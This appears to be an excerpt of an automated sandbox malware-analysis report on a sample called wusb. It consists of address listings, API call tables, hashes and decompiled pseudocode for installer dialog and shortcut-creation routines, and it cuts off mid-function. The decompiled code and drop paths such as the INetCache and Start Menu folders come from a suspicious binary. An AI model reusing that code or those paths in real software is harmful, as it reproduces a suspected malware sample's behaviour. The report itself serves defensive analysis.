                                                        0x00000000
                                                        0x10001fe5
                                                        0x10001fe8
                                                        0x10001feb
                                                        0x10001feb
                                                        0x10001fec
                                                        0x10001fed
                                                        0x10001ff0
                                                        0x10001ff3
                                                        0x10001ff6
                                                        0x00000000
                                                        0x00000000
                                                        0x10001ff8
                                                        0x10001ff8
                                                        0x10001ffc
                                                        0x10002014
                                                        0x10002017
                                                        0x10002021
                                                        0x00000000
                                                        0x10002021
                                                        0x10001ffe
                                                        0x10001ffe
                                                        0x10002001
                                                        0x00000000
                                                        0x00000000
                                                        0x10002003
                                                        0x10002006
                                                        0x10002008
                                                        0x10002009
                                                        0x10002009
                                                        0x10002009
                                                        0x1000200a
                                                        0x1000200d
                                                        0x10002010
                                                        0x10002011
                                                        0x10001feb
                                                        0x10001fec
                                                        0x10001fed
                                                        0x10001ff0
                                                        0x10001ff3
                                                        0x10001ff6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001ff6
                                                        0x00000000
                                                        0x10001e85
                                                        0x00000000
                                                        0x00000000
                                                        0x10001e91
                                                        0x00000000
                                                        0x00000000
                                                        0x10001e78
                                                        0x10001e7c
                                                        0x10001e80
                                                        0x00000000
                                                        0x00000000
                                                        0x10001fb6
                                                        0x10001fba
                                                        0x00000000
                                                        0x00000000
                                                        0x10001fc0
                                                        0x10001fc9
                                                        0x10001fd0
                                                        0x10001fd8
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f53
                                                        0x10001f53
                                                        0x00000000
                                                        0x00000000
                                                        0x10001e9a
                                                        0x00000000
                                                        0x00000000
                                                        0x10002040
                                                        0x00000000
                                                        0x00000000
                                                        0x10002030
                                                        0x00000000
                                                        0x00000000
                                                        0x10002034
                                                        0x00000000
                                                        0x00000000
                                                        0x1000203c
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f76
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f5b
                                                        0x10001f5d
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f7e
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f63
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f67
                                                        0x00000000
                                                        0x00000000
                                                        0x10002038
                                                        0x10002042
                                                        0x10002042
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f86
                                                        0x10001f8a
                                                        0x10001f8f
                                                        0x10001f92
                                                        0x10001f93
                                                        0x10001f96
                                                        0x10001f9c
                                                        0x10001f9c
                                                        0x00000000
                                                        0x00000000
                                                        0x10002028
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f6b
                                                        0x10001f6e
                                                        0x10001f70
                                                        0x00000000
                                                        0x00000000
                                                        0x10001ea1
                                                        0x10001ea1
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f7a
                                                        0x10001f80
                                                        0x10001f80
                                                        0x10001ea3
                                                        0x10001ea3
                                                        0x10001ea6
                                                        0x10001ead
                                                        0x10001eb0
                                                        0x10001eb2
                                                        0x10001eb4
                                                        0x10001eb5
                                                        0x10001eb9
                                                        0x10001ebc
                                                        0x10001ec2
                                                        0x10001ec8
                                                        0x10001ec8
                                                        0x10001eca
                                                        0x10001eca
                                                        0x10001ecd
                                                        0x10001ed3
                                                        0x10001ed5
                                                        0x10001ed9
                                                        0x10001ede
                                                        0x10001ede
                                                        0x10001ee0
                                                        0x10001ee0
                                                        0x10001ee3
                                                        0x10001ee6
                                                        0x10001eef
                                                        0x10001ef5
                                                        0x10001ef8
                                                        0x10001ef8
                                                        0x10001efa
                                                        0x10001efd
                                                        0x10001f03
                                                        0x00000000
                                                        0x10001f03
                                                        0x10001ec4
                                                        0x10001ec6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001e45
                                                        0x10001e4b
                                                        0x10001e4e
                                                        0x10001e50
                                                        0x10001e50
                                                        0x10001e53
                                                        0x10001e57
                                                        0x10001e64
                                                        0x10001e66
                                                        0x10001e6c
                                                        0x10001e6c
                                                        0x10001e6c
                                                        0x00000000
                                                        0x00000000
                                                        0x10001fa4
                                                        0x10001fa8
                                                        0x10001fad
                                                        0x10001fb0
                                                        0x10001f09
                                                        0x10001f09
                                                        0x10001f0b
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f11
                                                        0x10001f11
                                                        0x10001f15
                                                        0x10001f1c
                                                        0x10001f40
                                                        0x10001f40
                                                        0x10001f44
                                                        0x10001f46
                                                        0x10001f49
                                                        0x10001f49
                                                        0x10001f4c
                                                        0x10001f4c
                                                        0x00000000
                                                        0x10001f44
                                                        0x10001f21
                                                        0x10001f24
                                                        0x10001f24
                                                        0x10001f2b
                                                        0x10001f2d
                                                        0x10001f30
                                                        0x10001f37
                                                        0x10001f38
                                                        0x10001f3e
                                                        0x10001f3e
                                                        0x00000000
                                                        0x10001f3e
                                                        0x10001f32
                                                        0x10001f35
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001e3e
                                                        0x10001cff
                                                        0x10001cff
                                                        0x10001d00
                                                        0x10001e26
                                                        0x00000000
                                                        0x10001e26
                                                        0x10001d06
                                                        0x10001d07
                                                        0x00000000
                                                        0x00000000
                                                        0x10001d0f
                                                        0x10001d0f
                                                        0x10001d12
                                                        0x10001d5d
                                                        0x00000000
                                                        0x10001d5d
                                                        0x10001d14
                                                        0x10001d14
                                                        0x10001d17
                                                        0x10001d41
                                                        0x10001d44
                                                        0x10001d47
                                                        0x10001e18
                                                        0x10001e18
                                                        0x10001e18
                                                        0x10001d4d
                                                        0x10001d4d
                                                        0x10001d4d
                                                        0x10001e1e
                                                        0x00000000
                                                        0x10001e1e
                                                        0x10001d1a
                                                        0x10001d1a
                                                        0x10001d1b
                                                        0x10001d3e
                                                        0x10001d40
                                                        0x10001d40
                                                        0x00000000
                                                        0x10001d40
                                                        0x10001d1d
                                                        0x10001d1d
                                                        0x10001d20
                                                        0x10001d3a
                                                        0x00000000
                                                        0x10001d3a
                                                        0x10001d22
                                                        0x10001d22
                                                        0x10001d25
                                                        0x10001d36
                                                        0x00000000
                                                        0x10001d36
                                                        0x10001d27
                                                        0x10001d27
                                                        0x10001d28
                                                        0x10001d32
                                                        0x00000000
                                                        0x10001d32
                                                        0x10001d2b
                                                        0x10001d2c
                                                        0x00000000
                                                        0x00000000
                                                        0x10001d2e
                                                        0x00000000
                                                        0x10001d2e
                                                        0x00000000
                                                        0x10001bdd
                                                        0x10001b7f
                                                        0x10001b82
                                                        0x10001bb1
                                                        0x10001bb5
                                                        0x10001bbc
                                                        0x10001bc3
                                                        0x10001bc6
                                                        0x10001bc9
                                                        0x00000000
                                                        0x10001bc9
                                                        0x10001b84
                                                        0x10001b85
                                                        0x10001ba0
                                                        0x10001ba7
                                                        0x10001baa
                                                        0x00000000
                                                        0x10001baa
                                                        0x10001b8a
                                                        0x00000000
                                                        0x10001b90
                                                        0x10001b90
                                                        0x10001b97
                                                        0x00000000
                                                        0x10001b97
                                                        0x10001b8a
                                                        0x10001d83
                                                        0x10001d88
                                                        0x10001d8d
                                                        0x10001d91
                                                        0x100021c5
                                                        0x100021cb
                                                        0x10001da3
                                                        0x10001da5
                                                        0x10001da6
                                                        0x100020ee
                                                        0x100020ee
                                                        0x100020f1
                                                        0x100020f4
                                                        0x10002111
                                                        0x10002117
                                                        0x10002119
                                                        0x1000211f
                                                        0x10002136
                                                        0x10002136
                                                        0x10002136
                                                        0x10002143
                                                        0x10002149
                                                        0x1000214c
                                                        0x10002152
                                                        0x10002154
                                                        0x10002158
                                                        0x1000215a
                                                        0x10002161
                                                        0x10002166
                                                        0x10002169
                                                        0x1000216b
                                                        0x10002170
                                                        0x10002182
                                                        0x10002182
                                                        0x10002170
                                                        0x10002169
                                                        0x10002158
                                                        0x10002188
                                                        0x1000218b
                                                        0x10002195
                                                        0x1000219d
                                                        0x100021aa
                                                        0x100021b0
                                                        0x100021b3
                                                        0x100020e3
                                                        0x100020e3
                                                        0x00000000
                                                        0x100020e3
                                                        0x100021b9
                                                        0x100021bf
                                                        0x100021bf
                                                        0x00000000
                                                        0x00000000
                                                        0x100021c1
                                                        0x100021c1
                                                        0x100021c1
                                                        0x100021c1
                                                        0x00000000
                                                        0x1000218d
                                                        0x1000218d
                                                        0x10002193
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10002193
                                                        0x1000218b
                                                        0x10002122
                                                        0x10002128
                                                        0x1000212a
                                                        0x10002130
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10002130
                                                        0x100020f6
                                                        0x100020fd
                                                        0x10002103
                                                        0x10002109
                                                        0x00000000
                                                        0x10002109
                                                        0x10001dac
                                                        0x10001dad
                                                        0x100020cd
                                                        0x100020cd
                                                        0x100020d3
                                                        0x100020d6
                                                        0x00000000
                                                        0x00000000
                                                        0x100020dd
                                                        0x100020e2
                                                        0x00000000
                                                        0x100020e2
                                                        0x10001db4
                                                        0x00000000
                                                        0x00000000
                                                        0x10001dba
                                                        0x10001dba
                                                        0x10001dc3
                                                        0x10001dc8
                                                        0x10001dce
                                                        0x00000000
                                                        0x00000000
                                                        0x10001dd4
                                                        0x10001de1
                                                        0x10001de7
                                                        0x10001df1
                                                        0x10001df7
                                                        0x10001dff
                                                        0x10001e0f
                                                        0x00000000
                                                        0x10001e0f

                                                        APIs
                                                          • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                        • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                        • lstrcpyW.KERNEL32 ref: 10001C6C
                                                        • lstrcpyW.KERNEL32 ref: 10001C76
                                                        • GlobalFree.KERNEL32 ref: 10001C89
                                                        • GlobalFree.KERNEL32 ref: 10001D83
                                                        • GlobalFree.KERNEL32 ref: 10001D88
                                                        • GlobalFree.KERNEL32 ref: 10001D8D
                                                        • GlobalFree.KERNEL32 ref: 10001F38
                                                        • lstrcpyW.KERNEL32 ref: 1000209C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.677589038.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.677505776.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677602813.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677619149.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$lstrcpy$Alloc
                                                        • String ID: Nhv@hhv
                                                        • API String ID: 4227406936-2967376847
                                                        • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                        • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                        • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                        • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004046B0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E004046B0(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x4226c0; // 0x6d0ddc
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405892(0x3fb, _t146);
					E004064E0(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405892(0x3fb, _t146);
							if(E00405C25(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040624C(0x4216b8, _t146);
							_t87 = E00406626(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624C(0x4216b8, _t146);
								_t89 = E00405BC8(0x4216b8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216b8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216b8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216b8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405B69(0x4216b8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216b8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404B4D(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x4291dc + 0x10)) != _t158) {
									E00404B35(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216a8);
									} else {
										E00404A6C(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404203(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x4236d8 == _t158) {
									E00404609();
								}
								 *0x4236d8 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x4236e8;
							_v60 = E00404A06;
							_v56 = _t146;
							_v68 = E0040626E(_t146, 0x4236e8, _t167, 0x421ec0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405B1D(_t146);
								_t125 =  *((intOrPtr*)( *0x42a214 + 0x11c));
								if( *((intOrPtr*)( *0x42a214 + 0x11c)) != 0 && _t146 == L"C:\\Users\\alfons\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth") {
									E0040626E(_t146, 0x4236e8, _t167, 0, _t125);
									if(lstrcmpiW(0x4281a0, 0x4236e8) != 0) {
										lstrcatW(_t146, 0x4281a0);
									}
								}
								 *0x4236d8 =  *0x4236d8 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405B94(_t146) != 0 && E00405BC8(_t146) == 0) {
						E00405B1D(_t146);
					}
					 *0x4291d8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004041E1(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004041E1(_t167);
					E00404216(_t166);
					_t138 = E00406626(7);
					if(_t138 == 0) {
						L53:
						return E00404248(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                        0x004046b0
                                                        0x004046b6
                                                        0x004046bc
                                                        0x004046c9
                                                        0x004046d7
                                                        0x004046da
                                                        0x004046e2
                                                        0x004046e8
                                                        0x004046e8
                                                        0x004046f4
                                                        0x004046f7
                                                        0x00404765
                                                        0x0040476c
                                                        0x00404843
                                                        0x0040484a
                                                        0x00404859
                                                        0x00404859
                                                        0x0040485d
                                                        0x00404867
                                                        0x00404874
                                                        0x00404876
                                                        0x00404876
                                                        0x00404884
                                                        0x0040488b
                                                        0x00404892
                                                        0x00404895
                                                        0x004048d1
                                                        0x004048d3
                                                        0x004048d9
                                                        0x004048de
                                                        0x004048e2
                                                        0x004048e4
                                                        0x004048e4
                                                        0x00404900
                                                        0x00000000
                                                        0x00404902
                                                        0x00404905
                                                        0x00404913
                                                        0x00404919
                                                        0x0040491a
                                                        0x0040491d
                                                        0x00404920
                                                        0x00000000
                                                        0x00404920
                                                        0x00404897
                                                        0x00404899
                                                        0x0040489d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040489f
                                                        0x0040489f
                                                        0x004048ac
                                                        0x004048b1
                                                        0x00000000
                                                        0x00000000
                                                        0x004048b5
                                                        0x004048b7
                                                        0x004048b7
                                                        0x004048c0
                                                        0x004048c2
                                                        0x004048c7
                                                        0x004048ca
                                                        0x004048cf
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004048cf
                                                        0x0040492c
                                                        0x00404936
                                                        0x00404939
                                                        0x0040493c
                                                        0x00404943
                                                        0x00404943
                                                        0x00404945
                                                        0x00404945
                                                        0x0040494a
                                                        0x0040494c
                                                        0x00404954
                                                        0x0040495b
                                                        0x0040495d
                                                        0x00404968
                                                        0x00404968
                                                        0x0040495d
                                                        0x00404978
                                                        0x00404982
                                                        0x0040498a
                                                        0x004049a5
                                                        0x0040498c
                                                        0x00404995
                                                        0x00404995
                                                        0x0040498a
                                                        0x004049aa
                                                        0x004049af
                                                        0x004049b4
                                                        0x004049bd
                                                        0x004049bd
                                                        0x004049c6
                                                        0x004049c8
                                                        0x004049c8
                                                        0x004049d4
                                                        0x004049dc
                                                        0x004049e6
                                                        0x004049e6
                                                        0x004049eb
                                                        0x00000000
                                                        0x004049eb
                                                        0x00404895
                                                        0x0040484c
                                                        0x00404853
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404853
                                                        0x00404772
                                                        0x0040477b
                                                        0x00404795
                                                        0x0040479a
                                                        0x004047a4
                                                        0x004047ab
                                                        0x004047b7
                                                        0x004047ba
                                                        0x004047bd
                                                        0x004047c4
                                                        0x004047cc
                                                        0x004047cf
                                                        0x004047d3
                                                        0x004047da
                                                        0x004047e2
                                                        0x0040483c
                                                        0x004047e4
                                                        0x004047e5
                                                        0x004047ec
                                                        0x004047f6
                                                        0x004047fe
                                                        0x0040480b
                                                        0x0040481f
                                                        0x00404823
                                                        0x00404823
                                                        0x0040481f
                                                        0x00404828
                                                        0x00404835
                                                        0x00404835
                                                        0x004047e2
                                                        0x00000000
                                                        0x0040479a
                                                        0x00404788
                                                        0x00000000
                                                        0x00000000
                                                        0x0040478e
                                                        0x00000000
                                                        0x004046f9
                                                        0x00404706
                                                        0x0040470f
                                                        0x0040471c
                                                        0x0040471c
                                                        0x00404723
                                                        0x00404729
                                                        0x00404732
                                                        0x00404735
                                                        0x00404738
                                                        0x00404740
                                                        0x00404743
                                                        0x00404746
                                                        0x0040474c
                                                        0x00404753
                                                        0x0040475a
                                                        0x004049f1
                                                        0x00404a03
                                                        0x00404760
                                                        0x00404763
                                                        0x00000000
                                                        0x00404763
                                                        0x0040475a

                                                        APIs
                                                        • GetDlgItem.USER32 ref: 004046FF
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404729
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 004047DA
                                                        • CoTaskMemFree.OLE32(00000000), ref: 004047E5
                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,004236E8,00000000,?,?), ref: 00404817
                                                        • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 00404823
                                                        • SetDlgItemTextW.USER32 ref: 00404835
                                                          • Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5
                                                          • Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\wusb.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,766DFAA0,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                                          • Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                                          • Part of subcall function 004064E0: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\wusb.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,766DFAA0,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                                          • Part of subcall function 004064E0: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\wusb.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,766DFAA0,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                                        • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 004048F8
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
                                                          • Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                                          • Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
                                                          • Part of subcall function 00404A6C: SetDlgItemTextW.USER32 ref: 00404B29
                                                        Strings
                                                        • A, xrefs: 004047D3
                                                        • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 00404800
                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade, xrefs: 00404811, 00404816, 00404821
                                                        • 6B, xrefs: 004047AD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$6B
                                                        • API String ID: 2624150263-2099123020
                                                        • Opcode ID: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                                        • Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
                                                        • Opcode Fuzzy Hash: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                                        • Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E004020FE() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405B94( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
					E00402C37(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084dc, _t83, 1, 0x4084cc, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ec, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\alfons\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
						}
